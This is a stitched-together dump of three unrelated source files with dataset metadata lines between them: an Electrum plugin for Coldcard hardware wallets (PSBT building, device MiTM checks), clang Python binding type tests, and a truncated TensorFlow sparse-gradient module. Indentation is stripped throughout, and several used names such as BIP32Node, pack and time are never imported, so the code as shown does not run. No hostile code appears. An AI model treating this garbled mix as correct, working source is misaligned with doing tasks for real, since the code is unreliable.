from electrum.keystore import Hardware_KeyStore, xpubkey_to_pubkey, Xpub
from electrum.transaction import Transaction
from electrum.wallet import Standard_Wallet
from electrum.crypto import hash_160
from electrum.util import bfh, bh2u, versiontuple, UserFacingException
from electrum.base_wizard import ScriptTypeNotSupported
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import LibraryFoundButUnusable
_logger = get_logger(__name__)
try:
import hid
from ckcc.protocol import CCProtocolPacker, CCProtocolUnpacker
from ckcc.protocol import CCProtoError, CCUserRefused, CCBusyError
from ckcc.constants import (MAX_MSG_LEN, MAX_BLK_LEN, MSG_SIGNING_MAX_LENGTH, MAX_TXN_LEN,
AF_CLASSIC, AF_P2SH, AF_P2WPKH, AF_P2WSH, AF_P2WPKH_P2SH, AF_P2WSH_P2SH)
from ckcc.constants import (
PSBT_GLOBAL_UNSIGNED_TX, PSBT_IN_NON_WITNESS_UTXO, PSBT_IN_WITNESS_UTXO,
PSBT_IN_SIGHASH_TYPE, PSBT_IN_REDEEM_SCRIPT, PSBT_IN_WITNESS_SCRIPT,
PSBT_IN_BIP32_DERIVATION, PSBT_OUT_BIP32_DERIVATION, PSBT_OUT_REDEEM_SCRIPT)
from ckcc.client import ColdcardDevice, COINKITE_VID, CKCC_PID, CKCC_SIMULATOR_PATH
requirements_ok = True
class ElectrumColdcardDevice(ColdcardDevice):
# avoid use of pycoin for MiTM message signature test
def mitm_verify(self, sig, expect_xpub):
# verify a signature (65 bytes) over the session key, using the master bip32 node
# - customized to use specific EC library of Electrum.
pubkey = BIP32Node.from_xkey(expect_xpub).eckey
try:
pubkey.verify_message_hash(sig[1:65], self.session_key)
return True
except:
return False
except ImportError:
requirements_ok = False
COINKITE_VID = 0xd13e
CKCC_PID = 0xcc10
CKCC_SIMULATED_PID = CKCC_PID ^ 0x55aa
def my_var_int(l):
# Bitcoin serialization of integers... directly into binary!
if l < 253:
return pack("B", l)
elif l < 0x10000:
return pack("<BH", 253, l)
elif l < 0x100000000:
return pack("<BI", 254, l)
else:
return pack("<BQ", 255, l)
def xfp_from_xpub(xpub):
# sometime we need to BIP32 fingerprint value: 4 bytes of ripemd(sha256(pubkey))
# UNTESTED
kk = bfh(Xpub.get_pubkey_from_xpub(xpub, []))
assert len(kk) == 33
xfp, = unpack('<I', hash_160(kk)[0:4])
return xfp
class CKCCClient:
# Challenge: I haven't found anywhere that defines a base class for this 'client',
# nor an API (interface) to be met. Winging it. Gets called from lib/plugins.py mostly?
def __init__(self, plugin, handler, dev_path, is_simulator=False):
self.device = plugin.device
self.handler = handler
# if we know what the (xfp, xpub) "should be" then track it here
self._expected_device = None
if is_simulator:
self.dev = ElectrumColdcardDevice(dev_path, encrypt=True)
else:
# open the real HID device
import hid
hd = hid.device(path=dev_path)
hd.open_path(dev_path)
self.dev = ElectrumColdcardDevice(dev=hd, encrypt=True)
# NOTE: MiTM test is delayed until we have a hint as to what XPUB we
# should expect. It's also kinda slow.
def __repr__(self):
return '<CKCCClient: xfp=%08x label=%r>' % (self.dev.master_fingerprint,
self.label())
def verify_connection(self, expected_xfp, expected_xpub):
ex = (expected_xfp, expected_xpub)
if self._expected_device == ex:
# all is as expected
return
if ( (self._expected_device is not None)
or (self.dev.master_fingerprint != expected_xfp)
or (self.dev.master_xpub != expected_xpub)):
# probably indicating programing error, not hacking
_logger.info(f"xpubs. reported by device: {self.dev.master_xpub}. "
f"stored in file: {expected_xpub}")
raise RuntimeError("Expecting 0x%08x but that's not what's connected?!" %
expected_xfp)
# check signature over session key
# - mitm might have lied about xfp and xpub up to here
# - important that we use value capture at wallet creation time, not some value
# we read over USB today
self.dev.check_mitm(expected_xpub=expected_xpub)
self._expected_device = ex
_logger.info("Successfully verified against MiTM")
def is_pairable(self):
# can't do anything w/ devices that aren't setup (but not normally reachable)
return bool(self.dev.master_xpub)
def timeout(self, cutoff):
# nothing to do?
pass
def close(self):
# close the HID device (so can be reused)
self.dev.close()
self.dev = None
def is_initialized(self):
return bool(self.dev.master_xpub)
def label(self):
# 'label' of this Coldcard. Warning: gets saved into wallet file, which might
# not be encrypted, so better for privacy if based on xpub/fingerprint rather than
# USB serial number.
if self.dev.is_simulator:
lab = 'Coldcard Simulator 0x%08x' % self.dev.master_fingerprint
elif not self.dev.master_fingerprint:
# failback; not expected
lab = 'Coldcard #' + self.dev.serial
else:
lab = 'Coldcard 0x%08x' % self.dev.master_fingerprint
# Hack zone: during initial setup I need the xfp and master xpub but
# very few objects are passed between the various steps of base_wizard.
# Solution: return a string with some hidden metadata
# - see <https://stackoverflow.com/questions/7172772/abc-for-string>
# - needs to work w/ deepcopy
class LabelStr(str):
def __new__(cls, s, xfp=None, xpub=None):
self = super().__new__(cls, str(s))
self.xfp = getattr(s, 'xfp', xfp)
self.xpub = getattr(s, 'xpub', xpub)
return self
return LabelStr(lab, self.dev.master_fingerprint, self.dev.master_xpub)
def has_usable_connection_with_device(self):
# Do end-to-end ping test
try:
self.ping_check()
return True
except:
return False
def get_xpub(self, bip32_path, xtype):
assert xtype in ColdcardPlugin.SUPPORTED_XTYPES
_logger.info('Derive xtype = %r' % xtype)
xpub = self.dev.send_recv(CCProtocolPacker.get_xpub(bip32_path), timeout=5000)
# TODO handle timeout?
# change type of xpub to the requested type
try:
node = BIP32Node.from_xkey(xpub)
except InvalidMasterKeyVersionBytes:
raise UserFacingException(_('Invalid xpub magic. Make sure your {} device is set to the correct chain.')
.format(self.device)) from None
if xtype != 'standard':
xpub = node._replace(xtype=xtype).to_xpub()
return xpub
def ping_check(self):
# check connection is working
assert self.dev.session_key, 'not encrypted?'
req = b'1234 Electrum Plugin 4321' # free up to 59 bytes
try:
echo = self.dev.send_recv(CCProtocolPacker.ping(req))
assert echo == req
except:
raise RuntimeError("Communication trouble with Coldcard")
def show_address(self, path, addr_fmt):
# prompt user w/ addres, also returns it immediately.
return self.dev.send_recv(CCProtocolPacker.show_address(path, addr_fmt), timeout=None)
def get_version(self):
# gives list of strings
return self.dev.send_recv(CCProtocolPacker.version(), timeout=1000).split('\n')
def sign_message_start(self, path, msg):
# this starts the UX experience.
self.dev.send_recv(CCProtocolPacker.sign_message(msg, path), timeout=None)
def sign_message_poll(self):
# poll device... if user has approved, will get tuple: (addr, sig) else None
return self.dev.send_recv(CCProtocolPacker.get_signed_msg(), timeout=None)
def sign_transaction_start(self, raw_psbt, finalize=True):
# Multiple steps to sign:
# - upload binary
# - start signing UX
# - wait for coldcard to complete process, or have it refused.
# - download resulting txn
assert 20 <= len(raw_psbt) < MAX_TXN_LEN, 'PSBT is too big'
dlen, chk = self.dev.upload_file(raw_psbt)
resp = self.dev.send_recv(CCProtocolPacker.sign_transaction(dlen, chk, finalize=finalize),
timeout=None)
if resp != None:
raise ValueError(resp)
def sign_transaction_poll(self):
# poll device... if user has approved, will get tuple: (legnth, checksum) else None
return self.dev.send_recv(CCProtocolPacker.get_signed_txn(), timeout=None)
def download_file(self, length, checksum, file_number=1):
# get a file
return self.dev.download_file(length, checksum, file_number=file_number)
class Coldcard_KeyStore(Hardware_KeyStore):
hw_type = 'coldcard'
device = 'Coldcard'
def __init__(self, d):
Hardware_KeyStore.__init__(self, d)
# Errors and other user interaction is done through the wallet's
# handler. The handler is per-window and preserved across
# device reconnects
self.force_watching_only = False
self.ux_busy = False
# Seems like only the derivation path and resulting **derived** xpub is stored in
# the wallet file... however, we need to know at least the fingerprint of the master
# xpub to verify against MiTM, and also so we can put the right value into the subkey paths
# of PSBT files that might be generated offline.
# - save the fingerprint of the master xpub, as "xfp"
# - it's a LE32 int, but hex more natural way to see it
# - device reports these value during encryption setup process
lab = d['label']
if hasattr(lab, 'xfp'):
# initial setup
self.ckcc_xfp = lab.xfp
self.ckcc_xpub = lab.xpub
else:
# wallet load: fatal if missing, we need them!
self.ckcc_xfp = d['ckcc_xfp']
self.ckcc_xpub = d['ckcc_xpub']
def dump(self):
# our additions to the stored data about keystore -- only during creation?
d = Hardware_KeyStore.dump(self)
d['ckcc_xfp'] = self.ckcc_xfp
d['ckcc_xpub'] = self.ckcc_xpub
return d
def get_derivation(self):
return self.derivation
def get_client(self):
# called when user tries to do something like view address, sign somthing.
# - not called during probing/setup
rv = self.plugin.get_client(self)
if rv:
rv.verify_connection(self.ckcc_xfp, self.ckcc_xpub)
return rv
def give_error(self, message, clear_client=False):
self.logger.info(message)
if not self.ux_busy:
self.handler.show_error(message)
else:
self.ux_busy = False
if clear_client:
self.client = None
raise UserFacingException(message)
def wrap_busy(func):
# decorator: function takes over the UX on the device.
def wrapper(self, *args, **kwargs):
try:
self.ux_busy = True
return func(self, *args, **kwargs)
finally:
self.ux_busy = False
return wrapper
def decrypt_message(self, pubkey, message, password):
raise UserFacingException(_('Encryption and decryption are currently not supported for {}').format(self.device))
@wrap_busy
def sign_message(self, sequence, message, password):
# Sign a message on device. Since we have big screen, of course we
# have to show the message unabiguously there first!
try:
msg = message.encode('ascii', errors='strict')
assert 1 <= len(msg) <= MSG_SIGNING_MAX_LENGTH
except (UnicodeError, AssertionError):
# there are other restrictions on message content,
# but let the device enforce and report those
self.handler.show_error('Only short (%d max) ASCII messages can be signed.'
% MSG_SIGNING_MAX_LENGTH)
return b''
client = self.get_client()
path = self.get_derivation() + ("/%d/%d" % sequence)
try:
cl = self.get_client()
try:
self.handler.show_message("Signing message (using %s)..." % path)
cl.sign_message_start(path, msg)
while 1:
# How to kill some time, without locking UI?
time.sleep(0.250)
resp = cl.sign_message_poll()
if resp is not None:
break
finally:
self.handler.finished()
assert len(resp) == 2
addr, raw_sig = resp
# already encoded in Bitcoin fashion, binary.
assert 40 < len(raw_sig) <= 65
return raw_sig
except (CCUserRefused, CCBusyError) as exc:
self.handler.show_error(str(exc))
except CCProtoError as exc:
self.logger.exception('Error showing address')
self.handler.show_error('{}\n\n{}'.format(
_('Error showing address') + ':', str(exc)))
except Exception as e:
self.give_error(e, True)
# give empty bytes for error cases; it seems to clear the old signature box
return b''
def build_psbt(self, tx: Transaction, wallet=None, xfp=None):
# Render a PSBT file, for upload to Coldcard.
#
if xfp is None:
# need fingerprint of MASTER xpub, not the derived key
xfp = self.ckcc_xfp
inputs = tx.inputs()
if 'prev_tx' not in inputs[0]:
# fetch info about inputs, if needed?
# - needed during export PSBT flow, not normal online signing
assert wallet, 'need wallet reference'
wallet.add_hw_info(tx)
# wallet.add_hw_info installs this attr
assert tx.output_info is not None, 'need data about outputs'
# Build map of pubkey needed as derivation from master, in PSBT binary format
# 1) binary version of the common subpath for all keys
# m/ => fingerprint LE32
# a/b/c => ints
base_path = pack('<I', xfp)
for x in self.get_derivation()[2:].split('/'):
if x.endswith("'"):
x = int(x[:-1]) | 0x80000000
else:
x = int(x)
base_path += pack('<I', x)
# 2) all used keys in transaction
subkeys = {}
derivations = self.get_tx_derivations(tx)
for xpubkey in derivations:
pubkey = xpubkey_to_pubkey(xpubkey)
# assuming depth two, non-harded: change + index
aa, bb = derivations[xpubkey]
assert 0 <= aa < 0x80000000
assert 0 <= bb < 0x80000000
subkeys[bfh(pubkey)] = base_path + pack('<II', aa, bb)
for txin in inputs:
if txin['type'] == 'coinbase':
self.give_error("Coinbase not supported")
if txin['type'] in ['p2sh', 'p2wsh-p2sh', 'p2wsh']:
self.give_error('No support yet for inputs of type: ' + txin['type'])
# Construct PSBT from start to finish.
out_fd = io.BytesIO()
out_fd.write(b'psbt\xff')
def write_kv(ktype, val, key=b''):
# serialize helper: write w/ size and key byte
out_fd.write(my_var_int(1 + len(key)))
out_fd.write(bytes([ktype]) + key)
if isinstance(val, str):
val = bfh(val)
out_fd.write(my_var_int(len(val)))
out_fd.write(val)
# global section: just the unsigned txn
class CustomTXSerialization(Transaction):
@classmethod
def input_script(cls, txin, estimate_size=False):
return ''
unsigned = bfh(CustomTXSerialization(tx.serialize()).serialize_to_network(witness=False))
write_kv(PSBT_GLOBAL_UNSIGNED_TX, unsigned)
# end globals section
out_fd.write(b'\x00')
# inputs section
for txin in inputs:
if Transaction.is_segwit_input(txin):
utxo = txin['prev_tx'].outputs()[txin['prevout_n']]
spendable = txin['prev_tx'].serialize_output(utxo)
write_kv(PSBT_IN_WITNESS_UTXO, spendable)
else:
write_kv(PSBT_IN_NON_WITNESS_UTXO, str(txin['prev_tx']))
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
pubkeys = [bfh(k) for k in pubkeys]
for k in pubkeys:
write_kv(PSBT_IN_BIP32_DERIVATION, subkeys[k], k)
if txin['type'] == 'p2wpkh-p2sh':
assert len(pubkeys) == 1, 'can be only one redeem script per input'
pa = hash_160(k)
assert len(pa) == 20
write_kv(PSBT_IN_REDEEM_SCRIPT, b'\x00\x14'+pa)
out_fd.write(b'\x00')
# outputs section
for o in tx.outputs():
# can be empty, but must be present, and helpful to show change inputs
# wallet.add_hw_info() adds some data about change outputs into tx.output_info
if o.address in tx.output_info:
# this address "is_mine" but might not be change (I like to sent to myself)
output_info = tx.output_info.get(o.address)
index, xpubs = output_info.address_index, output_info.sorted_xpubs
if index[0] == 1 and len(index) == 2:
# it is a change output (based on our standard derivation path)
assert len(xpubs) == 1 # not expecting multisig
xpubkey = xpubs[0]
# document its bip32 derivation in output section
aa, bb = index
assert 0 <= aa < 0x80000000
assert 0 <= bb < 0x80000000
deriv = base_path + pack('<II', aa, bb)
pubkey = bfh(self.get_pubkey_from_xpub(xpubkey, index))
write_kv(PSBT_OUT_BIP32_DERIVATION, deriv, pubkey)
if output_info.script_type == 'p2wpkh-p2sh':
pa = hash_160(pubkey)
assert len(pa) == 20
write_kv(PSBT_OUT_REDEEM_SCRIPT, b'\x00\x14' + pa)
out_fd.write(b'\x00')
return out_fd.getvalue()
@wrap_busy
def sign_transaction(self, tx, password):
# Build a PSBT in memory, upload it for signing.
# - we can also work offline (without paired device present)
if tx.is_complete():
return
client = self.get_client()
assert client.dev.master_fingerprint == self.ckcc_xfp
raw_psbt = self.build_psbt(tx)
#open('debug.psbt', 'wb').write(out_fd.getvalue())
try:
try:
self.handler.show_message("Authorize Transaction...")
client.sign_transaction_start(raw_psbt, True)
while 1:
# How to kill some time, without locking UI?
time.sleep(0.250)
resp = client.sign_transaction_poll()
if resp is not None:
break
rlen, rsha = resp
# download the resulting txn.
new_raw = client.download_file(rlen, rsha)
finally:
self.handler.finished()
except (CCUserRefused, CCBusyError) as exc:
self.logger.info(f'Did not sign: {exc}')
self.handler.show_error(str(exc))
return
except BaseException as e:
self.logger.exception('')
self.give_error(e, True)
return
# trust the coldcard to re-searilize final product right?
tx.update(bh2u(new_raw))
@staticmethod
def _encode_txin_type(txin_type):
# Map from Electrum code names to our code numbers.
return {'standard': AF_CLASSIC, 'p2pkh': AF_CLASSIC,
'p2sh': AF_P2SH,
'p2wpkh-p2sh': AF_P2WPKH_P2SH,
'p2wpkh': AF_P2WPKH,
'p2wsh-p2sh': AF_P2WSH_P2SH,
'p2wsh': AF_P2WSH,
}[txin_type]
@wrap_busy
def show_address(self, sequence, txin_type):
client = self.get_client()
address_path = self.get_derivation()[2:] + "/%d/%d"%sequence
addr_fmt = self._encode_txin_type(txin_type)
try:
try:
self.handler.show_message(_("Showing address ..."))
dev_addr = client.show_address(address_path, addr_fmt)
# we could double check address here
finally:
self.handler.finished()
except CCProtoError as exc:
self.logger.exception('Error showing address')
self.handler.show_error('{}\n\n{}'.format(
_('Error showing address') + ':', str(exc)))
except BaseException as exc:
self.logger.exception('')
self.handler.show_error(exc)
class ColdcardPlugin(HW_PluginBase):
keystore_class = Coldcard_KeyStore
minimum_library = (0, 7, 2)
client = None
DEVICE_IDS = [
(COINKITE_VID, CKCC_PID),
(COINKITE_VID, CKCC_SIMULATED_PID)
]
#SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
SUPPORTED_XTYPES = ('standard', 'p2wpkh', 'p2wpkh-p2sh')
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_devices(self.DEVICE_IDS)
self.device_manager().register_enumerate_func(self.detect_simulator)
def get_library_version(self):
import ckcc
try:
version = ckcc.__version__
except AttributeError:
version = 'unknown'
if requirements_ok:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def detect_simulator(self):
# if there is a simulator running on this machine,
# return details about it so it's offered as a pairing choice
fn = CKCC_SIMULATOR_PATH
if os.path.exists(fn):
return [Device(path=fn,
interface_number=-1,
id_=fn,
product_key=(COINKITE_VID, CKCC_SIMULATED_PID),
usage_page=0,
transport_ui_string='simulator')]
return []
def create_client(self, device, handler):
if handler:
self.handler = handler
# We are given a HID device, or at least some details about it.
# Not sure why not we aren't just given a HID library handle, but
# the 'path' is unabiguous, so we'll use that.
try:
rv = CKCCClient(self, handler, device.path,
is_simulator=(device.product_key[1] == CKCC_SIMULATED_PID))
return rv
except:
self.logger.info('late failure connecting to device?')
return None
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
client.handler = self.create_handler(wizard)
def get_xpub(self, device_id, derivation, xtype, wizard):
# this seems to be part of the pairing process only, not during normal ops?
# base_wizard:on_hw_derivation
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = self.create_handler(wizard)
client.ping_check()
xpub = client.get_xpub(derivation, xtype)
return xpub
def get_client(self, keystore, force_pair=True):
# All client interaction should not be in the main GUI thread
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
#if client:
# client.used()
if client is not None:
client.ping_check()
return client
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
# Standard_Wallet => not multisig, must be bip32
if type(wallet) is not Standard_Wallet:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
sequence = wallet.get_address_index(address)
txin_type = wallet.get_txin_type(address)
keystore.show_address(sequence, txin_type)
# EOF
| mit | -8,262,395,673,221,224,000 | 36.066011 | 133 | 0.58088 | false |
ah744/ScaffCC_RKQC | clang/bindings/python/tests/cindex/test_type.py | 5 | 7493 | from clang.cindex import CursorKind
from clang.cindex import TypeKind
from nose.tools import raises
from .util import get_cursor
from .util import get_tu
kInput = """\
typedef int I;
struct teststruct {
int a;
I b;
long c;
unsigned long d;
signed long e;
const int f;
int *g;
int ***h;
};
"""
def test_a_struct():
tu = get_tu(kInput)
teststruct = get_cursor(tu, 'teststruct')
assert teststruct is not None, "Could not find teststruct."
fields = list(teststruct.get_children())
assert all(x.kind == CursorKind.FIELD_DECL for x in fields)
assert fields[0].spelling == 'a'
assert not fields[0].type.is_const_qualified()
assert fields[0].type.kind == TypeKind.INT
assert fields[0].type.get_canonical().kind == TypeKind.INT
assert fields[1].spelling == 'b'
assert not fields[1].type.is_const_qualified()
assert fields[1].type.kind == TypeKind.TYPEDEF
assert fields[1].type.get_canonical().kind == TypeKind.INT
assert fields[1].type.get_declaration().spelling == 'I'
assert fields[2].spelling == 'c'
assert not fields[2].type.is_const_qualified()
assert fields[2].type.kind == TypeKind.LONG
assert fields[2].type.get_canonical().kind == TypeKind.LONG
assert fields[3].spelling == 'd'
assert not fields[3].type.is_const_qualified()
assert fields[3].type.kind == TypeKind.ULONG
assert fields[3].type.get_canonical().kind == TypeKind.ULONG
assert fields[4].spelling == 'e'
assert not fields[4].type.is_const_qualified()
assert fields[4].type.kind == TypeKind.LONG
assert fields[4].type.get_canonical().kind == TypeKind.LONG
assert fields[5].spelling == 'f'
assert fields[5].type.is_const_qualified()
assert fields[5].type.kind == TypeKind.INT
assert fields[5].type.get_canonical().kind == TypeKind.INT
assert fields[6].spelling == 'g'
assert not fields[6].type.is_const_qualified()
assert fields[6].type.kind == TypeKind.POINTER
assert fields[6].type.get_pointee().kind == TypeKind.INT
assert fields[7].spelling == 'h'
assert not fields[7].type.is_const_qualified()
assert fields[7].type.kind == TypeKind.POINTER
assert fields[7].type.get_pointee().kind == TypeKind.POINTER
assert fields[7].type.get_pointee().get_pointee().kind == TypeKind.POINTER
assert fields[7].type.get_pointee().get_pointee().get_pointee().kind == TypeKind.INT
constarrayInput="""
struct teststruct {
void *A[2];
};
"""
def testConstantArray():
tu = get_tu(constarrayInput)
teststruct = get_cursor(tu, 'teststruct')
assert teststruct is not None, "Didn't find teststruct??"
fields = list(teststruct.get_children())
assert fields[0].spelling == 'A'
assert fields[0].type.kind == TypeKind.CONSTANTARRAY
assert fields[0].type.get_array_element_type() is not None
assert fields[0].type.get_array_element_type().kind == TypeKind.POINTER
assert fields[0].type.get_array_size() == 2
def test_equal():
"""Ensure equivalence operators work on Type."""
source = 'int a; int b; void *v;'
tu = get_tu(source)
a = get_cursor(tu, 'a')
b = get_cursor(tu, 'b')
v = get_cursor(tu, 'v')
assert a is not None
assert b is not None
assert v is not None
assert a.type == b.type
assert a.type != v.type
assert a.type != None
assert a.type != 'foo'
def test_typekind_spelling():
"""Ensure TypeKind.spelling works."""
tu = get_tu('int a;')
a = get_cursor(tu, 'a')
assert a is not None
assert a.type.kind.spelling == 'Int'
def test_function_argument_types():
"""Ensure that Type.argument_types() works as expected."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
assert f is not None
args = f.type.argument_types()
assert args is not None
assert len(args) == 2
t0 = args[0]
assert t0 is not None
assert t0.kind == TypeKind.INT
t1 = args[1]
assert t1 is not None
assert t1.kind == TypeKind.INT
args2 = list(args)
assert len(args2) == 2
assert t0 == args2[0]
assert t1 == args2[1]
@raises(TypeError)
def test_argument_types_string_key():
"""Ensure that non-int keys raise a TypeError."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
assert f is not None
args = f.type.argument_types()
assert len(args) == 2
args['foo']
@raises(IndexError)
def test_argument_types_negative_index():
"""Ensure that negative indexes on argument_types Raises an IndexError."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
args = f.type.argument_types()
args[-1]
@raises(IndexError)
def test_argument_types_overflow_index():
"""Ensure that indexes beyond the length of Type.argument_types() raise."""
tu = get_tu('void f(int, int);')
f = get_cursor(tu, 'f')
args = f.type.argument_types()
args[2]
@raises(Exception)
def test_argument_types_invalid_type():
"""Ensure that obtaining argument_types on a Type without them raises."""
tu = get_tu('int i;')
i = get_cursor(tu, 'i')
assert i is not None
i.type.argument_types()
def test_is_pod():
"""Ensure Type.is_pod() works."""
tu = get_tu('int i; void f();')
i = get_cursor(tu, 'i')
f = get_cursor(tu, 'f')
assert i is not None
assert f is not None
assert i.type.is_pod()
assert not f.type.is_pod()
def test_function_variadic():
"""Ensure Type.is_function_variadic works."""
source ="""
#include <stdarg.h>
void foo(int a, ...);
void bar(int a, int b);
"""
tu = get_tu(source)
foo = get_cursor(tu, 'foo')
bar = get_cursor(tu, 'bar')
assert foo is not None
assert bar is not None
assert isinstance(foo.type.is_function_variadic(), bool)
assert foo.type.is_function_variadic()
assert not bar.type.is_function_variadic()
def test_element_type():
"""Ensure Type.element_type works."""
tu = get_tu('int i[5];')
i = get_cursor(tu, 'i')
assert i is not None
assert i.type.kind == TypeKind.CONSTANTARRAY
assert i.type.element_type.kind == TypeKind.INT
@raises(Exception)
def test_invalid_element_type():
"""Ensure Type.element_type raises if type doesn't have elements."""
tu = get_tu('int i;')
i = get_cursor(tu, 'i')
assert i is not None
i.element_type
def test_element_count():
"""Ensure Type.element_count works."""
tu = get_tu('int i[5]; int j;')
i = get_cursor(tu, 'i')
j = get_cursor(tu, 'j')
assert i is not None
assert j is not None
assert i.type.element_count == 5
try:
j.type.element_count
assert False
except:
assert True
def test_is_volatile_qualified():
"""Ensure Type.is_volatile_qualified works."""
tu = get_tu('volatile int i = 4; int j = 2;')
i = get_cursor(tu, 'i')
j = get_cursor(tu, 'j')
assert i is not None
assert j is not None
assert isinstance(i.type.is_volatile_qualified(), bool)
assert i.type.is_volatile_qualified()
assert not j.type.is_volatile_qualified()
def test_is_restrict_qualified():
"""Ensure Type.is_restrict_qualified works."""
tu = get_tu('struct s { void * restrict i; void * j };')
i = get_cursor(tu, 'i')
j = get_cursor(tu, 'j')
assert i is not None
assert j is not None
assert isinstance(i.type.is_restrict_qualified(), bool)
assert i.type.is_restrict_qualified()
assert not j.type.is_restrict_qualified()
| bsd-2-clause | -3,257,201,517,061,547,000 | 26.148551 | 88 | 0.637528 | false |
a-doumoulakis/tensorflow | tensorflow/python/ops/sparse_grad.py | 61 | 10799 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in sparse_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_sparse_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import sparse_ops
# TODO(b/31222613): This op may be differentiable, and there may be
# latent bugs here.
ops.NotDifferentiable("SparseAddGrad")
ops.NotDifferentiable("SparseConcat")
ops.NotDifferentiable("SparseToDense")
@ops.RegisterGradient("SparseReorder")
def _SparseReorderGrad(op, unused_output_indices_grad, output_values_grad):
"""Gradients for the SparseReorder op.
Args:
op: the SparseReorder op
unused_output_indices_grad: the incoming gradients of the output indices
output_values_grad: the incoming gradients of the output values
Returns:
Gradient for each of the 3 input tensors:
(input_indices, input_values, input_shape)
The gradients for input_indices and input_shape is None.
"""
input_indices = op.inputs[0]
input_shape = op.inputs[2]
num_entries = array_ops.shape(input_indices)[0]
entry_indices = math_ops.range(num_entries)
sp_unordered = sparse_tensor.SparseTensor(
input_indices, entry_indices, input_shape)
sp_ordered = sparse_ops.sparse_reorder(sp_unordered)
inverted_permutation = array_ops.invert_permutation(sp_ordered.values)
return (None,
array_ops.gather(output_values_grad, inverted_permutation),
None)
@ops.RegisterGradient("SparseAdd")
def _SparseAddGrad(op, *grads):
"""The backward operator for the SparseAdd op.
The SparseAdd op calculates A + B, where A, B, and the sum are all represented
as `SparseTensor` objects. This op takes in the upstream gradient w.r.t.
non-empty values of the sum, and outputs the gradients w.r.t. the non-empty
values of A and B.
Args:
op: the SparseAdd op
*grads: the incoming gradients, one element per output of `op`
Returns:
Gradient for each of the 6 input tensors of SparseAdd:
(a_indices, a_values, a_shape, b_indices, b_values, b_shape, thresh)
The gradients for the indices, shapes, and the threshold are None.
"""
val_grad = grads[1]
a_indices = op.inputs[0]
b_indices = op.inputs[3]
sum_indices = op.outputs[0]
# NOTE: we do not need to take `thresh` into account, since it simply affects
# the non-zero elements of the sum, and we will peek into `sum_indices` in the
# gradient op.
# pylint: disable=protected-access
a_val_grad, b_val_grad = gen_sparse_ops._sparse_add_grad(val_grad, a_indices,
b_indices,
sum_indices)
a_val_grad.set_shape(op.inputs[1].get_shape())
b_val_grad.set_shape(op.inputs[4].get_shape())
# (a_indices, a_values, a_shape, b_indices, b_values, b_shape, thresh)
return (None, a_val_grad, None, None, b_val_grad, None, None)
@ops.RegisterGradient("SparseTensorDenseAdd")
def _SparseTensorDenseAddGrad(op, out_grad):
sp_indices = op.inputs[0]
# (sparse_indices, sparse_values, sparse_shape, dense)
return (None, array_ops.gather_nd(out_grad, sp_indices), None, out_grad)
@ops.RegisterGradient("SparseReduceSum")
def _SparseReduceSumGrad(op, out_grad):
"""Similar to gradient for the Sum Op (i.e. tf.reduce_sum())."""
sp_indices = op.inputs[0]
sp_shape = op.inputs[2]
output_shape_kept_dims = math_ops.reduced_shape(sp_shape, op.inputs[3])
out_grad_reshaped = array_ops.reshape(out_grad, output_shape_kept_dims)
scale = sp_shape // math_ops.to_int64(output_shape_kept_dims)
# (sparse_indices, sparse_values, sparse_shape, reduction_axes)
return (None, array_ops.gather_nd(out_grad_reshaped, sp_indices // scale),
None, None)
@ops.RegisterGradient("SparseTensorDenseMatMul")
def _SparseTensorDenseMatMulGrad(op, grad):
"""Gradients for the dense tensor in the SparseTensorDenseMatMul op.
If either input is complex, no gradient is provided.
Args:
op: the SparseTensorDenseMatMul op
grad: the incoming gradient
Returns:
Gradient for each of the 4 input tensors:
(sparse_indices, sparse_values, sparse_shape, dense_tensor)
The gradients for indices and shape are None.
Raises:
TypeError: When the two operands don't have the same type.
"""
a_indices, a_values, a_shape = op.inputs[:3]
b = op.inputs[3]
adj_a = op.get_attr("adjoint_a")
adj_b = op.get_attr("adjoint_b")
a_type = a_values.dtype.base_dtype
b_type = b.dtype.base_dtype
if a_type != b_type:
raise TypeError("SparseTensorDenseMatMul op received operands with "
"different types: ", a_type, " and ", b_type)
if a_type in (ops.dtypes.complex64, ops.dtypes.complex128):
raise NotImplementedError("SparseTensorDenseMatMul op does not support "
"complex gradients.")
# gradient w.r.t. dense
b_grad = gen_sparse_ops._sparse_tensor_dense_mat_mul( # pylint: disable=protected-access
a_indices, a_values, a_shape, grad, adjoint_a=not adj_a)
if adj_b:
b_grad = array_ops.transpose(b_grad)
# gradient w.r.t. sparse values
rows = a_indices[:, 0]
